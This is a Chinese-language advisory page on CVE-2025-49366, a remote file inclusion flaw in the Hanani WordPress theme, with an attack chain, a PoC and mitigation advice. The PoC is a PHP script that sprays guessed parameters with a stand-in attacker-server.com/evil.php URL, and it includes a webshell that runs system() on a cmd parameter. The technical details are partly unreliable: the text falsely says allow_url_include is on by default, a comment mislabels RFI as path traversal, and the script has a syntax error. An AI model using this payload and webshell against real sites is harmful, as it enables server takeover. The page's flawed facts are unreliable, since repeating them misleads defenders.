CVE-2025-49366 Hanani主题PHP远程文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-49366

漏洞类型

远程文件包含（RFI）

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AncoraThemes Hanani WordPress主题

漏洞概述

CVE-2025-49366是WordPress Hanani主题中的一个高危安全漏洞，CVSS评分达到8.1分。该漏洞属于PHP远程文件包含（Remote File Inclusion，RFI）类型，存在于Hanani主题的1.2.11及以下版本中。攻击者可以利用此漏洞通过构造恶意请求，包含远程服务器上的任意PHP文件，从而执行任意代码，实现对目标网站的完全控制。由于该漏洞无需认证即可利用，且对机密性、完整性和可用性都造成严重影响，因此被评定为高危漏洞。WordPress作为全球使用最广泛的内容管理系统之一，Hanani主题作为其商业主题产品，被众多网站使用，该漏洞的存在对大量网站构成严重安全威胁。

技术细节

该漏洞是由于Hanani主题在处理文件包含请求时，对用户可控的输入参数缺乏充分的验证和过滤所导致。在PHP应用程序中，文件包含功能（如include、require、include_once、require_once）通常用于模块化代码，但如果攻击者能够控制被包含文件的路径，就可以包含恶意文件并执行任意代码。Hanani主题在<=1.2.11版本中，存在多个可能存在文件包含的入口点，攻击者可以通过URL参数传递恶意文件路径，服务器会尝试从远程位置获取并执行该文件。攻击成功的关键在于服务器的allow_url_fopen和allow_url_include配置为启用状态（默认开启），使得PHP能够通过HTTP协议包含远程文件。攻击者通常会构造一个托管在自己控制服务器上的恶意PHP文件，该文件包含webshell代码，一旦被目标服务器包含执行，即可获得远程代码执行能力。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标网站使用的WordPress Hanani主题版本

STEP 2

2

准备阶段：攻击者在自己的服务器上托管包含webshell的恶意PHP文件

STEP 3

3

探测阶段：攻击者尝试不同的URL参数（template、file、action等）寻找文件包含入口点

STEP 4

4

利用阶段：通过存在漏洞的参数传递远程文件URL，服务器包含并执行恶意PHP文件

STEP 5

5

持久化：成功执行webshell后，攻击者获得远程命令执行能力，可进一步植入后门、窃取数据或完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-49366 PoC - Hanani Theme Local File Inclusion / Remote File Inclusion
 * Target: AncoraThemes Hanani WordPress Theme <= 1.2.11
 * Type: PHP Remote File Inclusion
 * 
 * Usage:
 * 1. Host a malicious PHP file on attacker-controlled server
 * 2. Replace ATTACKER_SERVER with your server IP/domain
 * 3. Replace TARGET_URL with the vulnerable WordPress site
 * 4. Execute the PoC
 */

$target_url = 'http://target-site.com/';
$attacker_server = 'http://attacker-server.com/';
$malicious_file = 'evil.php';

// Method 1: Direct Remote File Inclusion via common theme parameters
$vulnerable_params = [
    'template',
    'theme',
    'page',
    'file',
    'action',
    'view',
    'load'
];

echo "[*] CVE-2025-49366 PoC - Hanani Theme RFI\n";
echo "[*] Target: {$target_url}\n";
echo "[*] Attacker Server: {$attacker_server}\n\n";

foreach ($vulnerable_params as $param) {
    $payload = $attacker_server . $malicious_file;
    $exploit_url = $target_url . '?' . $param . '=' . urlencode($payload);
    
    echo "[+] Testing parameter: {$param}\n";
    echo "[+] Exploit URL: {$exploit_url}\n";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $exploit_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "[!] Potential vulnerability detected with parameter: {$param}\n\n";
    }
}

// Method 2: Direct file inclusion path traversal
$path_traversal_payload = $attacker_server . $malicious_file . '?cmd=whoami';
$exploit_url_2 = $target_url . '?file=' . urlencode($path_traversal_payload);
echo "[+] Alternative exploit URL: {$exploit_url_2}\n";

// Malicious PHP file example (to be hosted on attacker server)
$malicious_php = '<?php
if(isset($_GET["cmd"])) {
    system($_GET["cmd"]);
} else {
    echo "Shell uploaded - use ?cmd=<command>";
}
?>'

?>

影响范围

Hanani主题 <= 1.2.11

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）立即禁用或删除Hanani主题；2）在wp-config.php中添加代码禁用PHP的文件包含功能；3）使用WordPress安全插件限制主题文件的访问；4）配置服务器禁止通过URL参数包含远程文件；5）启用Web应用防火墙规则拦截可疑的文件包含请求；6）监控服务器日志关注异常的HTTP请求模式。